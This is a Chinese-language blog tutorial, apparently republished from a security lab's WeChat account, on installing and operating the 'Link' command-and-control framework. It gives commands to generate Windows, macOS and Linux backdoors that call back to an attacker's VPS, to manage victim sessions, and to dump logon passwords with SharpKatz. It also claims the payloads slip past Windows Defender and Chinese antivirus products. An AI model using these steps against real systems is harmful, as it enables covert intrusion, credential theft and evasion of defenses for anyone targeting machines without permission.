前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >⼀款新的C2攻击⼯具-Link

⼀款新的C2攻击⼯具-Link

作者头像
Ms08067安全实验室
发布2022-02-10 08:55:00
1.1K0
发布2022-02-10 08:55:00
举报

文章来源|MS08067 内网攻防知识星球

本文作者:清风(Ms08067内网小组核心成员)

⼀、⼯具简介

在翻看公众号的时候发现有⼤佬简单介绍了下这款⼯具,⽹上的教程⼏乎没有,简单研究了下。

Link :rust 语⾔开发的 c2 框架,因为开发语⾔⼩众,所以⽬前国内所有杀软都可过包括WindowsDefender。

功能虽然没有MSF和CobaltStrike成熟,但还是很强⼤的,⾜够实现红队渗透测试⼯作,当CS/MSF特征⽆法绕过的时候,可以尝试使⽤这个⼯具

项⽬地址:

https://github.com/postrequest/link

⼆、安装 不知道是什么原因,国外的vps安装后都⽆法⽣成载荷,暂时未能解决,最后⽤国内vps实验成功的 安装过程较为简单 :

代码语言:javascript
复制
$ git clone https://github.com/postrequest/link
$ cd link/
$ ./kali-install.sh

执⾏后 会出现这个⻚⾯后,三个选项分别是: 1、继续安装(默认安装) 2、⾃定义安装 3、取消安装

这⾥选择 1 默认安装即可 安装过程较为漫⻓,需要等待下⾯进度条结束:

结束后后直接重启,因为 rust 安装完后需要重启⽣效 :

重启后,再次进⼊到/link⽂件夹下,运⾏启动命令:

代码语言:javascript
复制
./target/release/link //不建议进⼊/target/release/⽬录再执⾏link,那样会让你指定
证书位置

启动后,会让你设置⼀个监听端⼝,这个端⼝也是后续shellcode中的端⼝ :

然后进⼊到link的管理模式下,

主要⽤到前三条: 在 Windows, MacOS , Linux 中⽣成载荷:

代码语言:javascript
复制
generate vps-ip:port #⽣成 windows 后⻔
generate-osx vps-ip:port #⽣成 苹果 载荷
generate-linux vps-ip:port #⽣成 linux 载荷

Windows 上线: ⽣成Windows后⻔(过程相当漫⻓,请耐⼼等待):

代码语言:javascript
复制
generate vps-ip:9080

运⾏link.exe 后上线: 查看当前会话:links ,类似MSF的Sessions

进⼊到当前会话 links -i 会话ID : 进⼊到当前会话中后 可以执⾏命令 whoami

抓取密码: 这个模块需要安装 SharpCollection ⼯具,不然会报错,提示你安装

安装完后再次执⾏:

代码语言:javascript
复制
sharp //可罗列出所有的tools

功能很多,这⾥只介绍SharpKatz模块

SharpKatz 参数介绍:

https://github.com/b4rtik/SharpKatz

代码语言:javascript
复制
sharp svchost SharpKatz --Command logonpasswords //抓取密码

还有很多功能,后续待补充。

Linux上线: ⽣成后⻔:

然后上传到⽬标运⾏ ,成功上线,然后就是Linux上线后的操作:

执⾏命令:

代码语言:javascript
复制
shell linux命令

未完待续。。。

ByPass ⽅⾯: 通过测试发现:Windows Defender、⽕绒、 360 动态、静态都可过

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2022-01-05,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Ms08067安全实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 文章来源|MS08067 内网攻防知识星球
相关产品与服务
网站渗透测试
网站渗透测试(Website Penetration Test,WPT)是完全模拟黑客可能使用的攻击技术和漏洞发现技术,对目标系统的安全做深入的探测,发现系统最脆弱的环节。渗透测试和黑客入侵最大区别在于渗透测试是经过客户授权,采用可控制、非破坏性质的方法和手段发现目标和网络设备中存在弱点,帮助管理者知道自己网络所面临的问题,同时提供安全加固意见帮助客户提升系统的安全性。腾讯云网站渗透测试由腾讯安全实验室安全专家进行,我们提供黑盒、白盒、灰盒多种测试方案,更全面更深入的发现客户的潜在风险。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档